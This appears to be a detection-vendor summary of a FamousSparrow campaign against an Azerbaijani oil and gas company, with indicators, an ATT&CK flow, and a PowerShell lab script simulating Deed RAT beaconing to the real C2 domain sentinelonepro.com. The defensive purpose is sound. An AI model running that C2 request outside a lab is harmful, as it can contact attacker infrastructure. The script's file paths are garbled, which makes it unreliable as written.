SOC Prime Bias: Critical

15 May 2026 12:49 UTC
newspaper icon Bitdefender Blog

FamousSparrow Targets Azerbaijan’s Oil and Gas Sector

Author Photo
SOC Prime Team linkedin icon Follow
FamousSparrow Targets Azerbaijan’s Oil and Gas Sector
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

Bitdefender Labs identified a multi-wave intrusion targeting an Azerbaijani oil and gas company between December 2025 and February 2026. The attackers exploited the ProxyShell and ProxyNotShell chains to compromise Microsoft Exchange, then deployed the Deed RAT and Terndoor backdoors through advanced DLL sideloading techniques while repeatedly returning through the same initial access point. Bitdefender attributed the activity with moderate-to-high confidence to the China-linked APT group FamousSparrow. The campaign also showcased sophisticated evasion methods, including API hooking and staged loader activation.

Investigation

Researchers documented three distinct waves of activity. The first involved web shell deployment on Exchange, followed by delivery of Deed RAT using a service that resembled LogMeIn Hamachi. The second wave attempted to deploy Terndoor through a USOShared and driver-based chain, while the final wave returned to Deed RAT with updated configuration data. Technical analysis uncovered custom encryption, RC4 and AES-CBC decryption routines, LZNT1 and Deflate compression, and a custom PE-like header structure. The attackers later moved laterally through RDP using a domain administrator account and employed SMB tooling from the Impacket framework.

Mitigation

Organizations should patch Exchange servers without delay and remediate all known ProxyShell and ProxyNotShell exposures. Network segmentation can help reduce the impact of credential reuse and lateral movement. Defenders should also deploy behavioral detections for DLL sideloading, API hooking, and suspicious service creation. Strict controls over privileged RDP access and SMB-based remote execution tools are also recommended.

Response

Security teams should alert on creation of web shell files inside IIS directories, unexpected Windows services named LogMeIn Hamachi, and driver service registrations launched from user-writable paths. HTTPS traffic to unusual domains such as virusblocker.it.com and sentinelonepro.com should be correlated with other suspicious activity. Investigators should also examine any process that patches StartServiceCtrlDispatcherW or loads suspicious DLLs alongside legitimate binaries.

"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef technique fill:#e0e0e0 %% Node definitions initial_access["<b>Initial Access</b> – <b>T1210 Exploitation of Remote Services</b><br/><b>Technique ID</b>: T1210<br/><b>Description</b>: Exploit vulnerable remote service such as Exchange server using ProxyShell or ProxyNotShell."] class initial_access action persistence_webshell["<b>Persistence</b> – <b>T1505.003 Web Shell</b><br/><b>Technique ID</b>: T1505.003<br/><b>Description</b>: Deploy a web shell on compromised server for persistent access."] class persistence_webshell action malicious_service["<b>Persistence</b> – <b>T1569 System Services</b><br/><b>Technique ID</b>: T1569<br/><b>Description</b>: Create a malicious service masquerading as LogMeIn Hamachi for persistence."] class malicious_service action tool_logmein["<b>Tool</b> – <b>Name</b>: LogMeIn Hamachi<br/><b>Description</b>: Legitimate VPN service used as disguise."] class tool_logmein tool execution_proxy["<b>Execution</b> – <b>T1218 Signed Binary Proxy Execution</b><br/><b>Technique ID</b>: T1218<br/><b>Description</b>: Use legitimate system binary to launch malicious code."] class execution_proxy action execution_masquerade["<b>Execution</b> – <b>T1036 Masquerading</b><br/><b>Technique ID</b>: T1036<br/><b>Description</b>: Rename malicious executable as LMIGuardianSvc.exe to blend in."] class execution_masquerade action malware_lmi["<b>Malware</b> – <b>Name</b>: LMIGuardianSvc.exe<br/><b>Description</b>: Loads malicious DLL after being executed."] class malware_lmi malware defense_reflective["<b>Defense Evasion</b> – <b>T1620 Reflective Code Loading</b><br/><b>Technique ID</b>: T1620<br/><b>Description</b>: Load code into memory without touching disk."] class defense_reflective action defense_processhollow["<b>Defense Evasion</b> – <b>T1055.012 Process Hollowing</b><br/><b>Technique ID</b>: T1055.012<br/><b>Description</b>: Replace legitimate process memory with malicious code."] class defense_processhollow action defense_threadhijack["<b>Defense Evasion</b> – <b>T1055.003 Thread Hijacking</b><br/><b>Technique ID</b>: T1055.003<br/><b>Description</b>: Hijack threads of a running process."] class defense_threadhijack action defense_hide["<b>Defense Evasion</b> – <b>T1564.010 Hide Artifacts</b><br/><b>Technique ID</b>: T1564.010<br/><b>Description</b>: Conceal malicious components from detection."] class defense_hide action payload_decrypt["<b>Payload Processing</b> – <b>T1560.003 Archive Decompression</b><br/><b>Technique ID</b>: T1560.003<br/><b>Description</b>: Decrypt and decompress payload before execution."] class payload_decrypt action lateral_movement["<b>Lateral Movement</b> – <b>T1078 Valid Accounts</b><br/><b>Technique ID</b>: T1078<br/><b>Description</b>: Use stolen credentials to move laterally via RDP and SMB admin shares."] class lateral_movement action tool_impacket["<b>Tool</b> – <b>Name</b>: Impacket<br/><b>Description</b>: Python library for network protocols used to pivot."] class tool_impacket tool c2_https["<b>Command and Control</b> – <b>T1071.001 Web Protocols HTTPS</b><br/><b>Technique ID</b>: T1071.001<br/><b>Description</b>: Communicate with C2 server over encrypted HTTPS."] class c2_https action c2_contentinject["<b>Command and Control</b> – <b>T1659 Content Injection</b><br/><b>Technique ID</b>: T1659<br/><b>Description</b>: Inject malicious content into legitimate HTTP responses."] class c2_contentinject action impact_kernel["<b>Impact</b> – <b>T1014 Rootkit</b><br/><b>Technique ID</b>: T1014<br/><b>Description</b>: Attempt to install kernel driver Terndoor for deep persistence."] class impact_kernel action %% Connections initial_access –>|leads_to| persistence_webshell persistence_webshell –>|leads_to| malicious_service malicious_service –>|uses| tool_logmein malicious_service –>|leads_to| execution_proxy execution_proxy –>|uses| execution_masquerade execution_masquerade –>|loads| malware_lmi malware_lmi –>|performs| defense_reflective defense_reflective –>|performs| defense_processhollow defense_processhollow –>|performs| defense_threadhijack defense_threadhijack –>|performs| defense_hide defense_hide –>|enables| payload_decrypt payload_decrypt –>|enables| lateral_movement lateral_movement –>|uses| tool_impacket lateral_movement –>|leads_to| c2_https c2_https –>|uses| c2_contentinject c2_contentinject –>|enables| impact_kernel "

Attack Flow

## Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

  • Attack Narrative & Commands:

    An adversary operating the Deed RAT wants to establish a persistent C2 channel to exfiltrate data and receive commands. Using PowerShell (T1059.001), the RAT initiates an HTTPS GET request to the hard‑coded malicious host sentinelonepro.com on port 443 (T1071.001). Because the connection is outbound, it traverses the Windows firewall and is captured by Sysmon as a NetworkConnect event. The detection rule should fire on this event.

  • Regression Test Script:

    <#
Deed RAT C2 simulation – creates an outbound HTTPS connection
to the known malicious host (sentinelonepro.com) on port 443.
This script is safe for testing in an isolated lab; the domain resolves
to a non‑routable IP (127.0.0.1) to avoid contacting real C2 infrastructure.
#>

# Override DNS resolution for safety (optional)
$hostsPath = "$env:SystemRootSystem32driversetchosts"
if (-not (Select-String -Path $hostsPath -Pattern "sentinelonepro.com")) {
    Add-Content -Path $hostsPath -Value "`n127.0.0.1 sentinelonepro.com"
}

# Perform the HTTPS request (simulated C2 traffic)
try {
    $response = Invoke-WebRequest -Uri "https://sentinelonepro.com/heartbeat" `
                                  -UseBasicParsing `
                                  -Headers @{ "User-Agent" = "DeedRAT/1.0" } `
                                  -TimeoutSec 10
    Write-Host "C2 request completed, status code:" $response.StatusCode
} catch {
    Write-Warning "C2 request failed (expected in isolated lab): $_"
}

  • Cleanup Commands:

    # Remove temporary hosts entry
$hostsPath = "$env:SystemRootSystem32driversetchosts"
(Get-Content $hostsPath) |
    Where-Object { $_ -notmatch "sentinelonepro.com" } |
    Set-Content $hostsPath

# Clear any residual files
Remove-Item -Path "$env:TEMPexample.html" -ErrorAction SilentlyContinue

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free